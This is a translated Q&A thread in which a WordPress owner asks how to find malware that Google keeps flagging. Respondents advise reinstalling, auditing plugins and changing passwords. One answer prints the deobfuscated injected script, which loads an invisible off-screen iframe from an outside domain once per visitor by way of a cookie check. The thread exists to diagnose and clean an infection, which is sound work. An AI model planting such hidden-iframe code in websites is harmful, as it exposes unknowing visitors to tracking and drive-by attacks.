【问题标题】：How to find malicous code/malware on a website [closed]如何在网站上查找恶意代码/恶意软件 [关闭]
【发布时间】：2013-09-09 10:08:08
【问题描述】：

我的 Wordpress 网站最近感染了恶意软件并被列入黑名单。我以为我通过更新站点和插件并删除任何我不认识的代码来修复它。

然后我使用了 Sucuri Site Checker，感觉还不错，所以我向 Google 提交了审核请求。然而，谷歌表示它仍然包含恶意代码形式的恶意软件（他们将其称为代码注入）。

我有点不知所措。有没有办法找到谷歌正在寻找的代码？域名是 sudorf.co.uk，但它有恶意软件，所以我不建议去那里 - 不知道恶意软件会做什么。

任何帮助将不胜感激。

编辑：我几天前发现了该代码并将其删除，然后我更新了所有版本等。但显然它又回来了。有谁知道它是如何到达那里的。我的想法是它要么来自插件——这就是我要删除所有插件的原因。另一个是联系表格——但我认为这不会允许他们编辑 header.php。

【问题讨论】：

在<body> 之后有一个<script> 的恶意块。它可以从多个地方注入，您最好的解决方案（与感染一样）是对其进行核攻击并返回到已知的良好版本。并查找最佳安全实践 - 最小化文件权限，与新版本保持同步，安装专门的 Wordpress 安全插件......但最终，Wordpress 是一个巨大的脚本小子磁铁，你会被一遍又一遍地攻击因为你运行 Wordpress。
关闭所有插件并恢复为标准主题，然后让 Google 重新测试。一个一个地添加，直到发现问题。 Google 是否没有提供更多详细信息（例如 URL）？
不，遗憾的是他们提供的唯一细节是代码注入。
@PectusExcavatum 将这种垃圾添加到您的网站的插件非常擅长隐藏插件中存在缺陷的证据。
您最好的解决方案是让经验丰富的服务器管理员或安全专家来确定您的网站是如何被黑客入侵的。在您确切知道代码是如何进入您的网站之前，您无法确定它不会再次出现。

标签： php html wordpress malware

【解决方案1】：

这是纯粹的信息。您的恶意软件经过去混淆处理后如下所示：

 function k09() {
     var static = 'ajax';
     var controller = 'index.php';
     var k = document.createElement('iframe');

     k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
     k.style.position = 'absolute';
     k.style.color = '512';
     k.style.height = '512px';
     k.style.width = '512px';
     k.style.left = '1000512';
     k.style.top = '1000512';

     if (!document.getElementById('k')) {
         document.write('<p id=\'k\' class=\'k09\' ></p>');
         document.getElementById('k').appendChild(k);
     }
 }

 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');

         k09();
     }
 }

http://dostojewskij-gesellschaft.de/VD49Jdzr.php 只是输出“OK”。

为什么？

我的猜测是这是一个 IP/流量记录器。也许让黑客检查哪些博客最活跃，然后再回来入侵该特定网站（无需在每月有 2 个访问者的网站上浪费时间）。这有好有坏。

好消息是他们似乎没有使用您的任何用户数据库或其他任何东西。

不好的部分是他们很可能已经下载了您的整个数据库，因为他们显然已经在您的服务器上拥有执行权限，并且可能已经将他们的 PHP 文件放置在您的服务器上。您最好的选择是从一个新的 WP 开始，并在手动检查它们的同时一个接一个地复制插件/主题。

更改所有密码。甚至您的数据库登录名。考虑一切都受到了损害。

【讨论】：

我会这样做的。感谢您的所有帮助